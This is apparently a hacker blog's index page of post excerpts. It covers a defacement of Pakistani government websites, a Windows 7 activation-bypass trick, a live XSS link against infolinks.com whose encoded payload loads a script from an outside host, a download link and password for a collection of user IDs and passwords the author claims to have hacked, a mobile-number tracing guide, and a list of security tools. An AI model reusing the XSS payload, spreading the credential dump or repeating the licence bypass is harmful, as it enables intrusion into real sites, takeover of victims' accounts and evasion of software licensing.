40 Pakistani government websites hacked

Nearly 40 Pakistani government websites were cyber attacked Tuesday by a group of hackers calling itself the “Indian Cyber Army,” The Express Tribune reports.

The websites were hosted on a single server, which allowed the hackers to take over multiple sites simultaneously, according to an email sent by the hackers. The hackers defaced several of the websites, displaying messages such as “Indian Cyber Army owns you. Rest in peace, the heroes of 26/11 who laid their precious lives for the country … because of some Pakistanis, whole of Pakistan is being given bad words.”

Nov. 26, 2008 marks the date when more than 10 coordinated shooting and bombing attacks occurred across Mumbai by Islamic terrorists from Pakistan. The attacks began Nov. 26, 2008, and lasted three days, killing at least 163 people, according to The New York Times.

Along with the written messages on the websites was an image of U.S. soldiers raising a flag on Iwo Jima, with the flag transformed into the Indian national flag. Background music also played a “highly patriotic Indian song,”according to two of the hackers involved, Jackh4x0r and LuCkY, who spoke to Hacker Regiment.

The two hackers also said this particular attack was to convey a message to the Pakistanis “on opposing the terror route being followed by their nation to disturb neighbours.”

“And 26/11 was the ideal time for conveying this message when our brave soldiers laid their precious life for the country people,” Jackh4x0r said.

Read more »

Windows 7 rearm hack

Most of you might be aware of the fact that it is possible to use Windows 7 and Vista for 120 days without activation. This is actually possible using the slmgr -rearm command which will extend the grace period from 30 days to 120 days. However in this post I will show you a small trick using which it is possible to use Windows 7 without activation for approximately an year! Here is a way to do that.
1. Goto “Start Menu -> All Programs -> Accessories” . Right click on “Command Prompt” and select “Run as Administrator“. If you are not the administrator then you are prompted to enter the password, or else you can proceed to step-2.
2. Now type the following command and hit enter

slmgr -rearm

3. You will be prompted to restart the computer. Once restarted the trial period will be once again reset to 30 days. You can use the above command for up to 3 times by which you can extend the trial period to 120 days without activation.
4. Now comes the actual trick by which you can extend the trial period for another 240 days. Open Registry Editor (type regedit in “Run” and hit Enter) and navigate to the following location

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform

5. In right-side pane, change value of SkipRearm to 1.
6. Now you will be able to use the slmgr -rearm command for another 8 times so that you can skip activation process for another 240 days. So you will get 120 + 240 = 360 days of free Windows 7 usage.

120 days using “slmgr -rearm” command before registry edit
+
240 days using “slmgr -rearm” command after registry edit
= 360 Days

Read more »

Programming competition at Bengalooru .

Any programmer cum Hacker in and around bangalooru can participate in this contest by a community called
Random Hacks of Kindness.  It is a world level contest , where  participators are request to give   innovative ideas and design application that would help a large community of peoples .Example tsunami predictor  etc .The best innovative idea and application will be given cash prizes .
Sponsors :  Microsoft , NASA , Google, Yahoo , World Bank .
Click here for more info and registration :
http://www.rhok.org/2010/10/registration-for-rhok-2-is-open/
Register fast.
Other locations of the event worldwide

Main Stages:

Aarhus, Denmark
Bangalore, India (Dec. 4 only)
Chicago, Illinois, U.S.A.
Nairobi, Kenya
New York, New York, U.S.A

Global Satellites:

Atlanta, Georgia, U.S.A.
Berlin, Germany
Birmingham, U.K. 
Bogota, Colombia
Boston, Massachusetts, U.S.A. (Dec. 5 only)
Buenos Aires, Argentina
Jakarta, Indonesia
Juarez, Mexico
Lusaka, Zambia
Mexico City, Mexico
San Francisco, California, U.S.A.
Sao Paulo, Brazil
Seattle, Washington, U.S.A.
Singapore
Tel Aviv, Israel (Dec. 3rd/4th)
Toronto, Canada

Read more »

XSS bug on infolinks website spotted by rascal .

Before introducing the bugs , i want to say about info links site ,
about this infolinks.com

Infolinks intelligently scans web pages using its dynamic proprietary algorithm and converts carefully selected keywords into relevant Pay Per Click (PPC) in-text ads. These ads appear as double underlined hyperlinks in the Web content itself. The process of integrating in-text ads into websites is short and simple. The basic integration requires the insertion of one line of Javascript code into the website’s html.

Infolinks in-text ads are seen on thousands of websites and are used by content based web publishers as an effective means to monetize.

Infolinks was established in 2007 and is headquarter in Mountain View, California.

this site has a xss bug , 

click the below link

http://www.infolinks.com/signup/your-script.html?denied=true&pid=166387&url=%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%79%6F%75%72%6A%61%76%61%73%63%72%69%70%74%2E%63%6F%6D%2F%31%30%38%31%39%31%34%31%33%32%32%2F%69%6E%66%6F%6C%69%6E%6B%73%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E

screen shot using another xss bug ,

Read more »

Biggest collection of Hacked Emails and Passwords .

The ultimate hack by the Rascal , check it out

It is a collection of 100s of user IDs and passwords hacked by me

Download Link:

http://www.mediafire.com/?janme4xzkgxq8ox

Password is: t3ch.in

Read more »

How to Trace Mobile Numbers

With the rapid growth of mobile phone usage in recent years, we have often observed that the mobile phone has become a part of many illegal and criminal activities. So in most cases, tracing the mobile number becomes a vital part of the investigation process. Also sometimes we just want to trace a mobile number for reasons like annoying prank calls, blackmails, unknown number in a missed call list or similar.

Even though it is not possible to trace the number back to the caller, it is possible to trace it to the location of the caller and also find the network operator. Just have a look at this page on tracing Indian mobile numbers from Wikipedia. Using the information provided on this page, it is possible to certainly trace any mobile number from India and find out the location (state/city) and network operator (mobile operator) of the caller. All you need for this is only the first 4-digit of the mobile number. In this Wiki page you will find all the mobile number series listed in a nice tabular column where they are categorized based on mobile operator and the zone (state/city). This Wiki page is updated regularly so as to provide up-to-date information on newly added mobile number series and operators. I have used this page many a time and have never been disappointed.

If you would like to use a simpler interface where in you can just enter the target mobile number and trace the desired details, you can try this link from Numbering Plans. Using this link, you can trace any number in the world.

By using the information in this article, you can only know “where” the call is from and not “who” the caller is. Only the mobile operator is able to tell you ”who” the caller is. So if you’re in an emergency and need to find out the actual person behind the call, I would recommend that you file a complaint and take the help of police. I hope this information has helped you!

Links available for tracing mobiles are ,

http://www.indiatrace.com/trace-mobile-number-location/trace-mobile-number.php

http://trace.bharatiyamobile.com/

mobile application available:
http://www.getjar.com/mobile/18195/indian-mobile-no-locator---shaplus-mobile-info/

http://www.getjar.com/mobile/48172/mobile-number-tracer-v1/

Read more »

best security tools .

here are some of the popular security / hacking tools that range from port scanning to password cracking , check it out .

1. Nmap

I think everyone has heard of this one, recently evolved into the 4.x series.

Nmap (“Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of comuters and both console and graphical versions are available. Nmap is free and open source.

Can be used by beginners (-sT) or by pros alike (–packet_trace). A very versatile tool, once you fully understand the results.

Get Nmap Here

2. Nessus Remote Security Scanner

Recently went closed source, but is still essentially free. Works with a client-server framework.

Nessus is the world’s most popular vulnerability scanner used in over 75,000 organizations world-wide. Many of the world’s largest organizations are realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications.

Get Nessus Here

3. John the Ripper

Yes, JTR 1.7 was recently released!

John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.

You can get JTR Here

4. Nikto

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).

Nikto is a good CGI scanner, there are some other tools that go well with Nikto (focus on http fingerprinting or Google hacking/info gathering etc, another article for just those).

Get Nikto Here

5. SuperScan

Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the highly popular Windows port scanning tool, SuperScan.

If you need an alternative for nmap on Windows with a decent interface, I suggest you check this out, it’s pretty nice.

Get SuperScan Here

6. p0f

P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:

– machines that connect to your box (SYN mode),
– machines you connect to (SYN+ACK mode),
– machine you cannot connect to (RST+ mode),
– machines whose communications you can observe.

Basically it can fingerprint anything, just by listening, it doesn’t make ANY active connections to the target machine.

Get p0f Here

7. Wireshark (Formely Ethereal)

Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers.

Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams! Will do a tutorial on Wireshark later.

Get Wireshark Here

8. Yersinia

Yersinia is a network tool designed to take advantage of some weakeness in different Layer 2 protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. Currently, the following network protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1q, Inter-Switch Link Protocol (ISL), VLAN Trunking Protocol (VTP).

The best Layer 2 kit there is.

Get Yersinia Here

9. Eraser

Eraser is an advanced security tool (for Windows), which allows you to completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns. Works with Windows 95, 98, ME, NT, 2000, XP and DOS. Eraser is Free software and its source code is released under GNU General Public License.

An excellent tool for keeping your data really safe, if you’ve deleted it..make sure it’s really gone, you don’t want it hanging around to bite you in the ass.

Get Eraser Here.

10. PuTTY

PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms, along with an xterm terminal emulator. A must have for any h4x0r wanting to telnet or SSH from Windows without having to use the crappy default MS command line clients.

Get PuTTY Here.

11. LCP

Main purpose of LCP program is user account passwords auditing and recovery in Windows NT/2000/XP/2003. Accounts information import, Passwords recovery, Brute force session distribution, Hashes computing.

A good free alternative to L0phtcrack.

Get LCP Here

12. Cain and Abel

My personal favourite for password cracking of any kind.

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort.

Get Cain and Abel Here

13. Kismet

Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.

A good wireless tool as long as your card supports rfmon (look for an orinocco gold).

Get Kismet Here

14. NetStumbler

Yes a decent wireless tool for Windows ! Sadly not as powerful as it’s Linux counterparts, but it’s easy to use and has a nice interface, good for the basics of war-driving.

NetStumbler is a tool for Windows that allows you to detect Wireless Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:

• Verify that your network is set up the way you intended.
• Find locations with poor coverage in your WLAN.
• Detect other networks that may be causing interference on your network.
• Detect unauthorized “rogue” access points in your workplace.
• Help aim directional antennas for long-haul WLAN links.
• Use it recreationally for WarDriving.

Get NetStumbler Here

15. hping

To finish off, something a little more advanced if you want to test your TCP/IP packet monkey skills.

hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.

Get hping Here

Read more »